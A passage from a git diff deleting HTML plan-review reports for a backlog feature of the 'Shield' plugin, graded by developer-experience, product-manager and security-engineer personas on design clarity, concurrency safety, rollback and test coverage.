-<td>B</td>
-<td><code>uv</code> is named as the runner; no credentials/accounts needed (local file, single actor — TRD §9 &quot;Secrets/auth: none&quot;). Not called out per-story, but the no-access nature is explicit, so the gap is low-impact.</td>
-</tr>
-<tr>
-<td>DX8</td>
-<td>Handoff readiness</td>
-<td>B</td>
-<td>Largely self-contained — a dev with no Slack context could start M1 today. Two handoff blockers: (1) the capture-helper signature deferred to a non-existent LLD; (2) three <code>design_refs</code> point to LLD components marked <code>TODO: link when /lld &lt;x&gt; lands</code> (backlog-store, epic-suggester, reconciler) — those links resolve to nothing today, so the deepest design detail for the hardest stories (reconciler) is not yet in any document.</td>
-</tr>
-<tr>
-<td>DX9</td>
-<td>Service boundaries</td>
-<td>A</td>
-<td>Clean separation: <code>backlog_store</code> owns atomic R/W + validation; <code>reconcile_backlog</code> is the single shared engine both triggers call (TRD §7, EPIC-3-S3 AC &quot;Eager and lazy paths call the same reconciliation engine&quot;). manifest = index, plan.json = gate is a clear, well-named ownership split. No ambiguous shared state — <code>backlog.json</code> has one writer path.</td>
-</tr>
-<tr>
-<td>DX10</td>
-<td>API &amp; data flow design</td>
-<td>A</td>
-<td>The <code>backlog.json</code> document contract is fully specified (TRD §11, F1, schema story). The consumed read-contract (<code>manifest features[].artifacts</code>, <code>plan.json epics[].stories[]</code>) is documented and I verified it matches the real manifest. Data flow diagrammed in TRD §7 and PRD §5 mermaid. Only soft spot: the skill write-helper return/signature (the one true &quot;API&quot; here) is deferred — counted under DX2/DX8.</td>
-</tr>
-<tr>
-<td>DX11</td>
-<td>Deployment strategy</td>
-<td>B</td>
-<td>For a plugin this means release/rollback, and it is addressed: TRD §14 rollback (git revert of git-tracked <code>backlog.json</code>, &quot;not invoking /backlog is a complete disable&quot;), staged safety (destructive reconciliation lands last in M3), and a documented fallback trigger (disable eager prune → manual-only). No phased rollout beyond milestone ordering, which is acceptable for internal tooling.</td>
-</tr>
-<tr>
-<td>DX12</td>
-<td>CI/CD integration</td>
-<td>C</td>
-<td>EPIC-4-S1 says &quot;wire into CI&quot; and &quot;CI runs the eval on PRs touching the backlog assets&quot; but names no workflow file, no existing CI entrypoint (e.g. which of <code>run-eval.sh</code>/<code>run-evals.sh</code>), and no path-filter mechanism. The repo has an eval runner convention the story should point at. This is the least-specified mechanical step.</td>
-</tr>
-<tr>
-<td>DX13</td>
-<td>Error handling patterns</td>
-<td>A</td>
-<td>Failure modes are enumerated and given concrete strategies: never-remove-on-doubt (F7, N3), atomic temp-then-rename + validate-or-refuse (N1), crash-mid-write leaves at most a <code>.tmp</code> cleaned next run, malformed/old upstream shapes → entry stays + logged warning (not exception), absent-id → clear no-op. This is the plan's strongest dimension.</td>
-</tr>
-<tr>
-<td>DX14</td>
-<td>Configuration management</td>
-<td>B</td>
-<td><code>output_dir</code> from <code>.shield.json</code> → <code>{output_dir}/backlog.json</code> (TRD §9). <code>schema_version</code> migration policy (read-old/write-new) is documented. No feature flags (none needed for staged-by-milestone rollout) and no secrets (none exist). Adequate for scope; not called out per-story.</td>
-</tr>
-<tr>
-<td>DX15</td>
-<td>Developer onboarding</td>
-<td>B</td>
-<td>Backlog SKILL.md is a deliverable (EPIC-1-S3, EPIC-4-S2) documenting capture/view/promote/remove + 3 triggers + match key. Gap: no local-dev/debugging guidance for the eval suite or how to run the validator/reconciler against a fixture during development — the &quot;run it locally&quot; loop is implied by <code>uv run</code> but not spelled out.</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Key Finding:</strong> This is a clear, architecturally sound, error-handling-first plan with verified prior art — but three <code>design_refs</code> point to LLD docs that don't exist yet (backlog-store, epic-suggester, reconciler) and the skill capture-helper signature is explicitly deferred, so the two hardest stories (capture interface, reconciler) are not yet fully handoff-ready.</p>
-<h4 id="recommendations">Recommendations</h4>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>DX8 / DX2</td>
-<td>Resolve TRD §12 Q3 before EPIC-1-S2 starts: add the skill write-helper signature (module location, parameter names/types for <code>{text, kind, feature?, epic?, source}</code>, return type = created entry id) to TRD §11 inline, OR commit to running <code>/lld backlog-store</code> first and mark EPIC-1-S2 blocked-on-LLD. Today the three <code>design_refs</code> reading <code>TODO: link when /lld &lt;x&gt; lands</code> resolve to nothing.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>DX4</td>
-<td>In EPIC-2-S2 and EPIC-3-S2, replace &quot;best match&quot; / &quot;names expected stable&quot; with a concrete matching algorithm: define the feature-name and epic-name match (exact? case-insensitive? normalized?), the tie-break/ambiguity rule that triggers &quot;entry stays&quot;, and what happens on epic-name rename. The match key is the core of reconciliation and is currently underspecified.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX12</td>
-<td>In EPIC-4-S1, name the CI entrypoint and path filter explicitly: which runner (<code>shield/evals/run-evals.sh</code> vs <code>run-eval.sh</code>), the workflow file to edit, and the glob that scopes &quot;backlog assets&quot; (e.g. <code>shield/{schema,scripts,skills/general/backlog}/**</code>). &quot;Wire into CI&quot; is not actionable without it.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX6</td>
-<td>Add an explicit intra-epic story dependency note for EPIC-3: S1 (transient reference) and S2 (engine) must land before S3 (triggers consume both). Currently only milestone-level deps are stated.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX3 / DX15</td>
-<td>Specify the badge render format once (EPIC-2-S1 shows <code>'research ✓ prd ✓ plan –'</code> as an example only) and add a one-line local-dev loop to the backlog SKILL.md deliverable (e.g. <code>uv run shield/scripts/reconcile_backlog.py &lt;fixture&gt;</code> to dry-run reconciliation).</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Overall persona grade: B</strong> (point average ≈ 3.4: eleven A/B-strong points; DX12 is the lone C; no Critical point graded below B, so no P0).</p>
-
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/product-manager.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/product-manager.html
deleted file mode 100644
index f2ae956d..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/product-manager.html
+++ /dev/null
@@ -1,196 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="utf-8">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<title>Shield Plan Review</title>
-<style>
-  body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
-  h1,h2,h3{line-height:1.25;margin-top:1.6em}
-  h1{border-bottom:2px solid #e1e4e8;padding-bottom:.3em}
-  h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
-  code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em}
-  pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto}
-  pre code{background:none;padding:0}
-  table{border-collapse:collapse;width:100%;margin:1em 0}
-  th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top}
-  th{background:#f6f8fa}
-  blockquote{border-left:4px solid #d0d7de;margin:1em 0;padding:.2em 1em;color:#57606a}
-  .meta{background:#fff8e6;border:1px solid #f0d999;border-radius:8px;padding:.6em 1em;font-size:.9em;color:#6a5500}
-</style>
-</head>
-<body>
-<div class="meta">Shield Plan Review · feature <code>backlog-20260527</code> · 2026-05-27 · rendered from markdown (source of truth in <code>reviews/plan/2026-05-27/</code>)</div>
-<h1 id="product-manager--detailed-findings">Product Manager — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<p>The PM persona is decomposed into 10 focused dimension subagents (PM1–PM10), each
-returning a single-check JSON result. They are rolled up here under the PM persona.</p>
-<p><strong>Persona grade: A</strong> — dim average = (4+4+4+4+3+4+4+4+4+2)/10 = <strong>3.7</strong> → A.</p>
-<table>
-<thead>
-<tr>
-<th>Dim</th>
-<th>Name</th>
-<th>Grade</th>
-<th>Severity</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>PM1</td>
-<td>User impact clarity</td>
-<td>A</td>
-<td>Critical</td>
-</tr>
-<tr>
-<td>PM2</td>
-<td>Problem-solution fit</td>
-<td>A</td>
-<td>Critical</td>
-</tr>
-<tr>
-<td>PM3</td>
-<td>Scope discipline (plan)</td>
-<td>A</td>
-<td>Important</td>
-</tr>
-<tr>
-<td>PM4</td>
-<td>Prioritization rationale</td>
-<td>A</td>
-<td>Important</td>
-</tr>
-<tr>
-<td>PM5</td>
-<td>Stakeholder communicability</td>
-<td>B</td>
-<td>Important</td>
-</tr>
-<tr>
-<td>PM6</td>
-<td>Market / competitive awareness</td>
-<td>A</td>
-<td>Warning</td>
-</tr>
-<tr>
-<td>PM7</td>
-<td>Adoption &amp; rollout risk</td>
-<td>A</td>
-<td>Important</td>
-</tr>
-<tr>
-<td>PM8</td>
-<td>Success metrics</td>
-<td>A</td>
-<td>Important</td>
-</tr>
-<tr>
-<td>PM9</td>
-<td>Reversibility &amp; exit cost</td>
-<td>A</td>
-<td>Warning</td>
-</tr>
-<tr>
-<td>PM10</td>
-<td>Business value alignment</td>
-<td><strong>C</strong></td>
-<td>Critical</td>
-</tr>
-</tbody>
-</table>
-<hr />
-<h3 id="pm1--user-impact-clarity--a-critical">PM1 — User impact clarity — A (Critical)</h3>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;PM1&quot;, &quot;name&quot;: &quot;User impact clarity&quot;, &quot;persona&quot;: &quot;product-manager&quot;,
-  &quot;grade&quot;: &quot;A&quot;, &quot;severity&quot;: &quot;Critical&quot;,
-  &quot;evidence_quote&quot;: &quot;| P1 | Ashwini — Shield maintainer running `/research`/`/plan`/`/implement` daily | Capture future work without losing focus on the current task; come back later to an ordered list of what to pick up next | Future ideas get lost or derail the current task; no ordered \&quot;later\&quot; list at the project level |&quot;,
-  &quot;gap&quot;: null, &quot;suggestion&quot;: null
-}
-</code></pre>
-<p>PRD §4 names personas P1 (Ashwini) and P2 (the agent) with concrete goals and frictions; §7 quantifies impact via success metrics.</p>
-<h3 id="pm2--problem-solution-fit--a-critical">PM2 — Problem-solution fit — A (Critical)</h3>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;PM2&quot;, &quot;name&quot;: &quot;Problem-solution fit&quot;, &quot;persona&quot;: &quot;product-manager&quot;,
-  &quot;grade&quot;: &quot;A&quot;, &quot;severity&quot;: &quot;Critical&quot;,
-  &quot;evidence_quote&quot;: &quot;Today there is **nowhere to park that work**. The options are bad: derail the current task to chase it, or drop it in a comment / memory / someone's head and lose it.&quot;,
-  &quot;gap&quot;: null, &quot;suggestion&quot;: null
-}
-</code></pre>
-<p>Every capability maps one-to-one onto the stated problem (store → &quot;nowhere to park&quot;, capture → agent-discovered-work gap, ordered list → &quot;what next&quot;, promotion+reconciliation → &quot;loose idea to plan&quot;). Problem-first ordering holds; scope creep fenced in §6 non-goals.</p>
-<h3 id="pm3--scope-discipline-plan--a-important">PM3 — Scope discipline (plan) — A (Important)</h3>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;PM3&quot;, &quot;name&quot;: &quot;Scope discipline (plan)&quot;, &quot;persona&quot;: &quot;product-manager&quot;,
-  &quot;grade&quot;: &quot;A&quot;, &quot;severity&quot;: &quot;Important&quot;,
-  &quot;evidence_quote&quot;: &quot;Out of scope:\n- Per-feature backlogs; PM-tool sync of un-promoted entries; a rejected/dropped audit trail; cross-project backlogs; priority buckets; end-of-task surfacing hooks. (See PRD §6/§11.)&quot;,
-  &quot;gap&quot;: null, &quot;suggestion&quot;: null
-}
-</code></pre>
-<p>MVP-shaped: TRD §3 Out of scope, PRD §6/§11 non-goals with rationale, lean PRD omits 11 standard sections by design, staged milestones, §8 alternatives reject heavier designs (A3 lifecycle engine, A4 hook reconciliation).</p>
-<h3 id="pm4--prioritization-rationale--a-important">PM4 — Prioritization rationale — A (Important)</h3>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;PM4&quot;, &quot;name&quot;: &quot;Prioritization rationale&quot;, &quot;persona&quot;: &quot;product-manager&quot;,
-  &quot;grade&quot;: &quot;A&quot;, &quot;severity&quot;: &quot;Important&quot;,
-  &quot;evidence_quote&quot;: &quot;**Staged safety:** M1 ships read/append + manual remove only; the destructive automatic reconciliation lands last (M3), so the risky path is introduced after the store is proven.&quot;,
-  &quot;gap&quot;: null, &quot;suggestion&quot;: null
-}
-</code></pre>
-<p>Explicit <code>depends_on</code> chain M1→M2→M3, per-story priority labels, and a staged-safety sequencing rationale in TRD §14.</p>
-<h3 id="pm5--stakeholder-communicability--b-important">PM5 — Stakeholder communicability — B (Important)</h3>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;PM5&quot;, &quot;name&quot;: &quot;Stakeholder communicability&quot;, &quot;persona&quot;: &quot;product-manager&quot;,
-  &quot;grade&quot;: &quot;B&quot;, &quot;severity&quot;: &quot;Important&quot;,
-  &quot;evidence_quote&quot;: &quot;Future work surfaces constantly while using Shield — during `/research`, while writing a PRD, mid-`/plan`, and especially during `/implement` (\&quot;we should also handle X later\&quot;, \&quot;this whole area needs a rewrite\&quot;). Today there is **nowhere to park that work**.&quot;,
-  &quot;gap&quot;: &quot;The plain-language WHAT/WHY lives only in the PRD; the TRD §1 overview and plan.md (the artifacts a reviewer hits first) lead with Shield-internal filesystem and pipeline jargon (manifest.json, reconciliation, eager/lazy prune) without a reader-facing summary.&quot;,
-  &quot;suggestion&quot;: &quot;Add a two-to-three-sentence plain-language executive summary at the top of trd.md and plan.md that states what is being built and why before the schema- and pipeline-heavy detail.&quot;
-}
-</code></pre>
-<h3 id="pm6--market--competitive-awareness--a-warning">PM6 — Market / competitive awareness — A (Warning)</h3>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;PM6&quot;, &quot;name&quot;: &quot;Market / competitive awareness&quot;, &quot;persona&quot;: &quot;product-manager&quot;,
-  &quot;grade&quot;: &quot;A&quot;, &quot;severity&quot;: &quot;Warning&quot;,
-  &quot;evidence_quote&quot;: &quot;**A1. Stamp a `backlog_id` onto the promoted story in `plan.json`** (id-based reconciliation). Rejected: re-introduces a synthetic id and writes into `plan.json`; the feature(manifest)+epic(plan) match key reconciles with no stamping.&quot;,
-  &quot;gap&quot;: null, &quot;suggestion&quot;: null
-}
-</code></pre>
-<p>TRD §8 names four alternatives (A1–A4) with rejection rationale; PRD §6/§11 positions vs the incumbent PM tool's own backlog and the do-nothing baseline.</p>
-<h3 id="pm7--adoption--rollout-risk--a-important">PM7 — Adoption &amp; rollout risk — A (Important)</h3>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;PM7&quot;, &quot;name&quot;: &quot;Adoption &amp; rollout risk&quot;, &quot;persona&quot;: &quot;product-manager&quot;,
-  &quot;grade&quot;: &quot;A&quot;, &quot;severity&quot;: &quot;Important&quot;,
-  &quot;evidence_quote&quot;: &quot;Capture friction too high → nobody captures | Single-step capture; agent can capture without prompting | @ashwinimanoj&quot;,
-  &quot;gap&quot;: null, &quot;suggestion&quot;: null
-}
-</code></pre>
-<p>PRD §10 names behavioral-change risks with mitigations + owner; the load-bearing &quot;agents reliably surface follow-up work&quot; assumption is explicitly flagged unvalidated with a revisit trigger; §7 tracks capture-friction as a metric.</p>
-<h3 id="pm8--success-metrics--a-important">PM8 — Success metrics — A (Important)</h3>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;PM8&quot;, &quot;name&quot;: &quot;Success metrics&quot;, &quot;persona&quot;: &quot;product-manager&quot;,
-  &quot;grade&quot;: &quot;A&quot;, &quot;severity&quot;: &quot;Important&quot;,
-  &quot;evidence_quote&quot;: &quot;≥70% reach a terminal state (promoted/landed in a plan, or explicitly dropped) within 30 days; &lt;20% sit untouched &gt;60 days&quot;,
-  &quot;gap&quot;: null, &quot;suggestion&quot;: null
-}
-</code></pre>
-<p>PRD §7 has a quantified, time-bound metrics table (≥70%, &lt;20%, 100%, ≥60%) with counters and a stated manual/git-history measurement plan (TRD N6). Soft spot: &quot;capture friction&quot; is qualitative.</p>
-<h3 id="pm9--reversibility--exit-cost--a-warning">PM9 — Reversibility &amp; exit cost — A (Warning)</h3>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;PM9&quot;, &quot;name&quot;: &quot;Reversibility &amp; exit cost&quot;, &quot;persona&quot;: &quot;product-manager&quot;,
-  &quot;grade&quot;: &quot;A&quot;, &quot;severity&quot;: &quot;Warning&quot;,
-  &quot;evidence_quote&quot;: &quot;**Steps to undo:** `backlog.json` is git-tracked — `git revert` (or restore the file) recovers any wrongly-removed entry. The `/backlog` command is additive to the plugin; not invoking it is a complete disable.&quot;,
-  &quot;gap&quot;: null, &quot;suggestion&quot;: null
-}
-</code></pre>
-<p>TRD §14 assesses the exit ramp, staged risk profile, and a named fallback trigger; corroborated by §6 N4 and §9 schema_version migration.</p>
-<h3 id="pm10--business-value-alignment--c-critical">PM10 — Business value alignment — C (Critical)</h3>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;PM10&quot;, &quot;name&quot;: &quot;Business value alignment&quot;, &quot;persona&quot;: &quot;product-manager&quot;,
-  &quot;grade&quot;: &quot;C&quot;, &quot;severity&quot;: &quot;Critical&quot;,
-  &quot;evidence_quote&quot;: &quot;**(unvalidated)** The volume/loss of future-work items today is high enough to justify the tool — no baseline count has been measured; v1's own `backlog.json` history will validate it.&quot;,
-  &quot;gap&quot;: &quot;The tool's core justification is an operational-savings claim (avoiding lost future-work) that the docs themselves flag as unvalidated with no measured baseline, so the business value is asserted rather than evidenced.&quot;,
-  &quot;suggestion&quot;: &quot;Capture even a rough baseline — e.g. count lost/re-derived future-work items over a recent week of Shield usage from git history or chat logs — to ground the operational-savings claim before committing all four milestones.&quot;
-}
-</code></pre>
-
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/security-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/security-engineer.html
deleted file mode 100644
index ed0a6fda..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/security-engineer.html
+++ /dev/null
@@ -1,176 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="utf-8">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<title>Shield Plan Review</title>
-<style>
-  body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
-  h1,h2,h3{line-height:1.25;margin-top:1.6em}
-  h1{border-bottom:2px solid #e1e4e8;padding-bottom:.3em}
-  h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
-  code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em}
-  pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto}
-  pre code{background:none;padding:0}
-  table{border-collapse:collapse;width:100%;margin:1em 0}
-  th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top}
-  th{background:#f6f8fa}
-  blockquote{border-left:4px solid #d0d7de;margin:1em 0;padding:.2em 1em;color:#57606a}
-  .meta{background:#fff8e6;border:1px solid #f0d999;border-radius:8px;padding:.6em 1em;font-size:.9em;color:#6a5500}
-</style>
-</head>
-<body>
-<div class="meta">Shield Plan Review · feature <code>backlog-20260527</code> · 2026-05-27 · rendered from markdown (source of truth in <code>reviews/plan/2026-05-27/</code>)</div>
-<h1 id="security-engineer--detailed-findings">Security Engineer — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<h2 id="security-engineer-review-grade-b">Security Engineer Review (Grade: B)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Evaluation Point</th>
-<th>Grade</th>
-<th>Notes</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>SE1</td>
-<td>Threat model coverage</td>
-<td>B</td>
-<td>Concrete threats are named and mitigated: concurrent-write corruption (N1), wrong removal / epic-name collision (PRD §10 risk table, TRD §14 trigger), read-contract drift (N3). Adversary model is implicit (&quot;single actor, no network&quot;), which is reasonable for the asset, but there's no explicit enumeration of the <em>agent-as-actor</em> threat: a <code>source=agent</code> writer is a semi-trusted automated actor that can inject entries unattended. No threat is listed for malicious/garbage content reaching downstream <code>/plan</code>/<code>/implement</code> via the transient promotion reference.</td>
-</tr>
-<tr>
-<td>SE2</td>
-<td>Least-privilege design</td>
-<td>B+</td>
-<td>Genuinely good for the scope. Promotion deliberately does NOT stamp ids into <code>plan.json</code> (F6/EPIC-3-S1) — minimizes write surface into the trusted artifact. Reconciliation is read-only against <code>manifest.json</code>/<code>plan.json</code> and only writes <code>backlog.json</code>. Removal is gated (never-remove-on-doubt). The only write privilege is to one file.</td>
-</tr>
-<tr>
-<td>SE3</td>
-<td>Data protection</td>
-<td>A−</td>
-<td>Strong for local tooling. N4 makes removal recoverable via <code>git revert</code>; N1 protects integrity; atomic temp-then-rename prevents partial writes. The one gap: &quot;plain delete, no retained history&quot; (F5/EPIC-1-S4) means manual remove of an <em>uncommitted</em> entry that was never git-committed is unrecoverable — N4's recoverability claim only holds for entries that reached a commit. Not called out.</td>
-</tr>
-<tr>
-<td>SE4</td>
-<td>Secrets management</td>
-<td>A</td>
-<td>Correctly scoped: TRD §9 &quot;Secrets/auth: none — local file, no network, single actor.&quot; <code>backlog.json</code> holds work-item text only. No secret storage surface exists. The risk worth one line — free-text capture could <em>accidentally</em> contain a pasted secret that then lands in git history — is not mentioned, but it's a Warning at most.</td>
-</tr>
-<tr>
-<td>SE5</td>
-<td>Network security</td>
-<td>A</td>
-<td>Genuinely out of scope and correctly claimed. No network surface; not penalized per instructions.</td>
-</tr>
-<tr>
-<td>SE6</td>
-<td>Access control</td>
-<td>B</td>
-<td>Single-actor claim is justified for a local dev file. But &quot;access control&quot; here maps to the <strong>agent-vs-user write distinction</strong>, which the plan <em>models</em> (<code>source ∈ {user, agent}</code>) but does not <em>enforce or use as a trust signal</em> — an agent-captured entry is treated identically to a user one at promotion/reconciliation. That's acceptable for v1 but the <code>source</code> field's security purpose (provenance/audit) is undefined.</td>
-</tr>
-<tr>
-<td>SE7</td>
-<td>Compliance requirements</td>
-<td>A</td>
-<td>N5 makes the explicit data-classification claim: internal, non-PII developer work-item text, same trust boundary as <code>plan.json</code>/<code>manifest.json</code>. The claim is justified — the data co-locates with and is no more sensitive than artifacts already in the repo. No regulated data, no compliance regime applies. Well-reasoned, not hand-waved.</td>
-</tr>
-<tr>
-<td>SE8</td>
-<td>Incident response</td>
-<td>B</td>
-<td>TRD §14 has a real rollback/containment story: staged rollout (destructive reconciliation lands last, M3), an explicit <em>trigger</em> (&quot;if eager prune produces a wrong removal git revert can't cheaply recover → disable eager prune, fall back to manual-remove-only&quot;), and a kill switch (not invoking <code>/backlog</code> = full disable). Detection is the weak spot: a wrong removal is detected only by a human noticing a missing entry — N3 logs warnings on drift but nothing alerts on an actual erroneous removal.</td>
-</tr>
-<tr>
-<td>SE9</td>
-<td>Acceptance criteria quality</td>
-<td>B+</td>
-<td>ACs are largely specific and testable. Strong examples: &quot;killing capture mid-write leaves no corrupted backlog.json (only a .tmp may remain)&quot; (EPIC-1-S2), &quot;prd-only feature is NOT removed&quot; (EPIC-3-S2), &quot;second pass is a no-op (idempotent)&quot; (EPIC-3-S3), named validator errors. Gaps: N1's central race (&quot;concurrent capture racing reconciliation&quot;) has no AC that actually <em>exercises concurrency</em> — the mid-write-kill AC tests crash-atomicity, not the two-writer race the NFR claims to defend. &quot;Validate-or-refuse on read&quot; has no AC proving a malformed file is <em>refused</em> rather than silently read.</td>
-</tr>
-<tr>
-<td>SE10</td>
-<td>Edge case &amp; rollback coverage</td>
-<td>A−</td>
-<td>Best-covered area. Edge cases enumerated and turned into fixtures (EPIC-4-S1): prd-only-stays, plan-committed-removed, ambiguous-stays, malformed-stays. Never-remove-on-doubt is the safety default. Rollback is git-revert + staged introduction + documented fallback trigger (§14). Missing edges: the <code>.tmp</code> cleanup (&quot;cleaned on next run&quot;) has no failure-mode coverage if cleanup itself fails; epic-name <em>collision across two features</em> is mentioned as a risk but no fixture asserts it stays.</td>
-</tr>
-<tr>
-<td>SE11</td>
-<td>Integration test strategy</td>
-<td>B</td>
-<td>EPIC-4 evals are self-contained, no-LLM, CI-wired, and cover the cross-file contract (backlog.json × manifest.json × plan.json) — good. But the <em>eager-prune integration point</em> (end of a real <code>/plan</code> / <code>/implement</code> run) is the highest-risk wiring and the eval covers it via fixtures, not via an actual command run. The read-contract coupling to upstream schemas (§11) is acknowledged but there's no contract test that <em>fails</em> when manifest/plan schema drifts.</td>
-</tr>
-<tr>
-<td>SE12</td>
-<td>Regression risk assessment</td>
-<td>A−</td>
-<td>Blast radius is well-bounded and stated: the only destructive behavior is entry removal (§14); <code>/backlog</code> is additive to the plugin; promotion is read-only against <code>plan.json</code> (no stamping → no regression to existing planning). Staged M1→M3 sequencing puts the risky reconciliation last behind a proven store. The unaddressed regression: eager-prune hooks <em>into</em> <code>/plan</code> and <code>/implement</code> — a bug there could affect those commands' exit behavior, and that blast radius isn't explicitly assessed.</td>
-</tr>
-<tr>
-<td>SE13</td>
-<td>Environment validation plan</td>
-<td>C</td>
-<td>Weakest point. No dev/staging/prod distinction (reasonable — it's local tooling), but there's also no smoke-test or first-run validation plan: how does a maintainer verify reconciliation is behaving correctly against their <em>real</em> <code>backlog.json</code> before trusting auto-removal? §14 mentions a fallback but not a &quot;validate before enabling eager prune&quot; canary step. The N2 performance budget (~1s, ≤50 features/200 entries) has no validation method attached.</td>
-</tr>
-<tr>
-<td>SE14</td>
-<td>Security validation</td>
-<td>B−</td>
-<td>The security-relevant behaviors that DO get validated: atomicity (crash test), never-remove-on-doubt (fixtures), validator rejection of bad enums. Missing: no test asserting the <strong>validate-or-refuse refusal path</strong> actually refuses (only that crash leaves no corruption); no concurrency stress test for the N1 race; no negative test that promotion does NOT write to <code>plan.json</code> (F6 is the key trust-boundary guarantee and has an AC but no eval listed in EPIC-4-S1's coverage list).</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Key Finding:</strong> The plan's core integrity and safety design is strong and well-reasoned for its scope (atomic write, never-remove-on-doubt, git-revert recoverability, staged rollout), and the N5 trust-boundary/classification claim is justified — but the N1 concurrency guarantee and the F6 no-stamping trust boundary are asserted without a test that actually exercises them, so the two most security-load-bearing claims are currently unverifiable.</p>
-<h3 id="recommendations">Recommendations</h3>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>SE9 / SE14</td>
-<td>Add an eval that exercises the <strong>actual N1 race</strong>, not just crash-atomicity: spawn a concurrent capture and a reconciliation write against the same <code>backlog.json</code> and assert no corruption and no lost entry. The mid-write-kill AC tests a different failure mode than the &quot;capture racing reconciliation&quot; the NFR claims to defend. Without it, N1 is an unverified assertion.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>SE14</td>
-<td>Add a negative eval to EPIC-4-S1's coverage list asserting that promotion via <code>/plan</code>/<code>/implement</code> leaves <code>plan.json</code> and story records <strong>byte-unchanged</strong> (no id stamping). F6 is the load-bearing trust-boundary guarantee; it has an AC but is absent from the listed eval coverage.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>SE9</td>
-<td>Add an explicit AC (EPIC-1-S2) that a <strong>malformed/partial <code>backlog.json</code> on read is refused with a named error</strong>, not silently read or truncated. &quot;Validate-or-refuse on read&quot; is stated in F2/N1 but no AC proves the refusal path.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>SE13</td>
-<td>Add a first-run / canary validation step before auto-removal is trusted: e.g. a <code>--dry-run</code> reconciliation mode that reports what <em>would</em> be removed, so a maintainer validates against their real backlog before enabling eager prune. Pairs naturally with the §14 fallback.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>SE10 / SE14</td>
-<td>Add a fixture for <strong>epic-name collision across two different features</strong> (PRD §10 names it as a risk; §14 names it as the rollback trigger) asserting the entry stays. The proposed-new match-by-name path is the one place a wrong removal is plausible; it deserves a dedicated negative test.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>SE1 / SE6</td>
-<td>Define the security purpose of the <code>source ∈ {user, agent}</code> field. Either state it is provenance/audit-only (and that agent and user entries are equally trusted at reconciliation), or use it. Right now an unattended <code>source=agent</code> writer is a semi-trusted actor with no distinct handling, and the threat model doesn't address agent-injected entries flowing into <code>/plan</code> via the transient reference.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>SE3</td>
-<td>Note in N4/EPIC-1-S4 that git-revert recoverability only covers entries that reached a commit; a manual remove of an uncommitted entry is unrecoverable by design. Small doc fix that aligns the recoverability claim with the &quot;plain delete, no history&quot; decision.</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Overall persona grade: B</strong> (point average ≈ 3.05 → B). The plan is security-sound for local single-actor tooling with a justified trust-boundary/classification claim and genuinely good integrity/rollback design; it falls short of A because its two most security-critical guarantees (N1 concurrency, F6 no-stamping) lack tests that exercise them, and environment/first-run validation (SE13) is thin.</p>
-
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/sre.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/sre.html
deleted file mode 100644
index ff0f8f27..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/sre.html
